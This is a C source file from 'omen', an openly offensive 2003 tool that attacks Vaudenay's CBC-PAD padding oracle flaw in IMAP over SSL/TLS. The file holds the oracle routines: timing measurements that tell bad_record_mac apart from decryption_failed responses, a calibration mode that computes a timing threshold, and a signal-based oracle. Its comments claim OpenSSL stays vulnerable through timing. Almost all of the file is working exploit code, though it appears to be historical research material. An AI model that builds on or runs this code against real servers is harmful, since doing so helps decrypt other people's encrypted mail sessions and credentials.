/*
 * omen  - Attack of the Vau[02] CBC-PAD flaw with Imap over SSL/TLS
 *
 * Copyright (c) 2003 Martin Vuagnoux <martin@vuagnoux.com>
 *
 * omen  is free software; you can redistribute it and/or modify it under
 * the terms of the GNU General Public License as published by the Free
 * Software Foundation; either version 2, or (at your option) any later
 * version.
 *
 * omen  is distributed in the hope that it will be useful, but WITHOUT ANY
 * WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
 * FOR A PARTICULAR PURPOSE.  See the GNU General Public License for more
 * details.
 *
 * You should have received a copy of the GNU General Public License along
 * with wavemon; see the file COPYING.  If not, write to the Free Software
 * Foundation, 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
 */

#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <ncurses.h>

#include <signal.h>
#include <sys/time.h>

#include "conf.h"
#include "proxy.h"
#include "ui.h"

/* number of tests for the auto mode */
#define NB_OF_TESTS 10


/* the signal return value */
static int sig_value;

/* this value is to repeat twice the check of a bad record mac to be sure */
static int verify = 0;

/* don't check the first values. They are not good */
static int repetition = 0;

/* OMEN MODE VARIABLES */
static float brm_total = 0;
static float df_total = 0;

/* oracle with a timing method. On a lan 100Mb/s
 * the Bad Record Mac for a 16k pkt is        ~ 3400-3500 us
 * and the Decryption Failed for a 16k pkt is ~ 3200-3300 us
 * with OpenSSL 9.7 (rev. 31 december 2002) ;)
 * I smile because Openssl since 9.6c say unbreakable because
 * return always a bad record mac and no decryption_failed
 * With a timing attack OpenSSL *IS* vulnerable.
 */
int oracle_timing(struct cbcPadConf *conf)
{
  long long time_diff;
  FILE *fd;

  /* timing attack */
  time_diff = (conf->tv2.tv_sec - conf->tv1.tv_sec) * 1000000L + (conf->tv2.tv_usec - conf->tv1.tv_usec);
  //  wprintw(conf->debugWin, "tv2 : %d[s] %d[us]\n", conf->tv2.tv_sec, conf->tv2.tv_usec);
  //  wprintw(conf->debugWin, "tv1 : %d[s] %d[us]\n", conf->tv1.tv_sec, conf->tv1.tv_usec);
  wprintw(conf->debugWin, "%d [us]\n", time_diff);
  wrefresh(conf->debugWin);
 
  /* OMEN MODE */
  if (conf->threshold == -1) {
    /* bad_record_mac */
    if (repetition < NB_OF_TESTS) {
      brm_total = brm_total + time_diff;
      repetition++;
      /* if we want to save the values to compute probabilities */
      // if ((fd = fopen("BRM.stat", "a")) == NULL) {
      // fprintf(stderr, "Cannot write BRM.stat\n");
      // perror("fopen()");
      // exit(EXIT_FAILURE);
      // }
      // fprintf(fd, "%.0f\n", (float) time_diff);
      // fflush(fd);
      // fclose(fd);

      wattron(conf->debugWin, COLOR_PAIR(COLOR_GREEN));
      wprintw(conf->debugWin, "mean(bad_record_mac): %.0f\n", brm_total/repetition);
      wattron(conf->debugWin, COLOR_PAIR(COLOR_WHITE));
      wrefresh(conf->debugWin);
      if (repetition == NB_OF_TESTS)
	conf->attack_word[0] = 0xa;
      return 0;
    }
    /* decryption failed */
    if ((repetition >= NB_OF_TESTS) && (repetition < 2*NB_OF_TESTS)) {
      df_total = df_total + time_diff;
      repetition++;

      /* if we want to save the values to compute probabilities */
      // if ((fd = fopen("DF.stat", "a")) == NULL) {
      // fprintf(stderr, "Cannot write DF.stat\n");
      //  perror("fopen()");
      // exit(EXIT_FAILURE);
      // }
      // fprintf(fd, "%.0f\n", (float) time_diff);
      // fflush(fd);
      // fclose(fd);



      wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
      wprintw(conf->debugWin, "mean(decryption_failed): %.0f\n", df_total/(repetition -NB_OF_TESTS));
      wattron(conf->debugWin, COLOR_PAIR(COLOR_WHITE));
      wrefresh(conf->debugWin);
      return 0;
    }
    if (repetition == 2*NB_OF_TESTS) {
      wattron(conf->debugWin, A_BOLD);
      wprintw(conf->debugWin, "\nOMEN says: threshold = %.0f\n", 
	      (df_total/NB_OF_TESTS) + ((brm_total/NB_OF_TESTS - df_total/NB_OF_TESTS))/3);
      wattroff(conf->debugWin, A_BOLD);
      wattron(conf->debugWin, COLOR_PAIR(COLOR_GREEN));
      wprintw(conf->debugWin, "           mean(bad_record_mac)    = %.0f\n", brm_total/NB_OF_TESTS);
      wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
      wprintw(conf->debugWin, "           mean(decryption_failed) = %.0f\n", df_total/NB_OF_TESTS);
      wattron(conf->debugWin, COLOR_PAIR(COLOR_WHITE));
      wattron(conf->debugWin, A_BLINK|A_BOLD);
      wprintw(conf->debugWin, "\n\nRE-RUN omen with -t %.0f\n\n", 
	      (df_total/NB_OF_TESTS) + ((brm_total/NB_OF_TESTS - df_total/NB_OF_TESTS))/3); 
      wattroff(conf->debugWin, A_BLINK|A_BOLD);
      wrefresh(conf->debugWin);
      exit_success(conf);
      return 0;
	      
    }
    /* non reach */
    return -1;
  }

  /* NORMAL MODE */
  else {
    /* too much/less time.. ignoring */
    if ((time_diff > conf->threshold + conf->threshold/8) || (time_diff < conf->threshold - conf->threshold/8) || repetition < 5) {
      repetition++;
      return 0;
    }
    else if (time_diff > conf->threshold) {
      /* Bad Record Mac */
      verify++;
      wattron(conf->debugWin, COLOR_PAIR(COLOR_GREEN));
      wprintw(conf->debugWin, "bad_record_mac\n\n");
      wattron(conf->debugWin, COLOR_PAIR(COLOR_WHITE));
      wrefresh(conf->debugWin);
      if (verify == 2) {
	verify = 0;
	return 1;
      }
      else
	return 0;
    }
    else {
      /* Decryption Failed */
      
      /* init verify */
      verify = 0;
      
      wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
      wprintw(conf->debugWin, "decryption_failed\n\n");
      wattron(conf->debugWin, COLOR_PAIR(COLOR_WHITE));
      wrefresh(conf->debugWin);
      return 2;
    }
  }
}
void signal_process(int signal) {

  /* bad record mac detected (SIGUSR1)    */
  if (signal == SIGUSR1)
    sig_value = 1;
  
  /* decryption failed detected (SIGUSR2) */
  if (signal == SIGUSR2) 
    sig_value = 2;
}

void oracle_signal_init(struct cbcPadConf *conf)
{

  /* init */
  sig_value = -1;

  (void) signal(SIGUSR1, signal_process);
  (void) signal(SIGUSR2, signal_process);
}


int oracle_signal(struct cbcPadConf *conf)
{

  /* no signal */
  if (sig_value == -1) {
    wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
    wprintw(conf->debugWin, "no signal :( check ssldump -AdnP -k <key>\n\n");
    wattron(conf->debugWin, COLOR_PAIR(COLOR_WHITE));
    wrefresh(conf->debugWin);

  }
  else if (sig_value == 1) {
    wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
    wprintw(conf->debugWin, "bad_record_mac or decode error\n\n");
    wattron(conf->debugWin, COLOR_PAIR(COLOR_WHITE));
    wrefresh(conf->debugWin);
    sig_value = -1;
    return 1;
  }
  else if (sig_value == 2) {
    wattron(conf->debugWin, COLOR_PAIR(COLOR_RED));
    wprintw(conf->debugWin, "decryption_failed\n\n");
    wattron(conf->debugWin, COLOR_PAIR(COLOR_WHITE));
    wrefresh(conf->debugWin);
    sig_value = -1;
    return 2;
  }
  return 0;
}
